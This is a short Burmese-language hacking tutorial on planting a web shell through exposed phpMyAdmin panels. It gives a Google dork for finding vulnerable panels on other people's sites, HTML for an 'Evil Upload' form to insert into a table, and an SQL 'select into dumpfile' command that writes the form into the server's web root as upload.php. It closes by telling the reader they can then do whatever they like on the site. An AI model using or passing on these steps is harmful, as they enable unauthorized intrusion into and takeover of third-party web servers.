How to upload a Shell Via PHP Myadmin
PHP Myadmin ေတြ By Pass ေပါက္ေနတာ ျမင္ဖူးၾကမွာပါ ( ဥပမာ allinurl:index.php?db=information_schema လို႕ Google မွာရိုက္ရွာလိုက္ရင္ By Pass လုပ္လို႕ရေနတဲ့ PHP Myadmin ေတြအမ်ားၾကီးေတြ႕ရပါလိမ့္မယ္ဒီလိုအေျခအေနမ်ိဳးမွာ ဘယ္လို Shell တင္မလဲ..?? ဒါမ်ိဳးကိုေျပာတာေပါ့ )
ပထမဆံုး DataBase တစ္ခု Create လုပ္ပါ့မယ္
ျပီးရင္ Table တစ္ခု Create လုပ္ပါ့မယ္
ျပီးရင္
Table ေဆာက္ျပီးသြားတာနဲ႕ File တင္ဖုိ႕စလုပ္ရပါေတာ့မယ္ Shell အရင္မတင္ခင္ Upload Form တစ္ခုအရင္တင္လုိက္ပါ Upload Form Code ကိုေတာ့ ေအာက္မွာပဲယူလိုက္ပါ
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN”
“http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
>
<head>
Evil Z0ne
</head>
<body bgcolor=”#000000″>
<div style=” color:#F00;text-align:center; margin-top:60px; font-size:25px;
“>>> Evil Upload !!! </div>
<div style=”padding-top:75px;margin-left:450px;width:340px; height:70px;”>
<form enctype=”multipart/form-data” action=”upload.php” method=”post”>
<input name=”userfile” type=”file” />
<input type=”submit” value=”Upload” />
</form>
</div>
</body>
</html>
အဲ့ဒီ့ Code ကို Copy ကူးျပီး Insert လုပ္ပါ့မယ္ ဒီေတာ့ Insert Tab ကိုသြားလိုက္ပါ ျပီးရင္Copy ကူးထည့္လိုက္ျပီး Go လုပ္လိုက္ပါ
ဒါဆို Insert လုပ္ျပီးသြားပါျပီ ေနာက္ထပ္ PHP Info မွာ Server ရဲ႕ Document Location သိေအာင္လုပ္ရပါ့မယ္
အဲ့ဒီ့မွာဆုိရင္ေတာ့ C:/xampp/htdocs ေပါ့ ဒါဆုိရင္ select * into dumpfile ‘C:/xampp/htdocs/upload.php’ from shell ဆိုျပီး SQL Command ေပးလိုက္ရံုပါပဲ
ဒါဆိုရင္ www.site.com/upload.php မွာ သြားျပီး Upload Page ကို Access လုပ္လိုက္ရင္ရပါျပီ
ဒါဆို သင္ၾကိဳက္သလို ျပဳမူႏဳိင္ပါျပိ :-P
Ref : Hack Community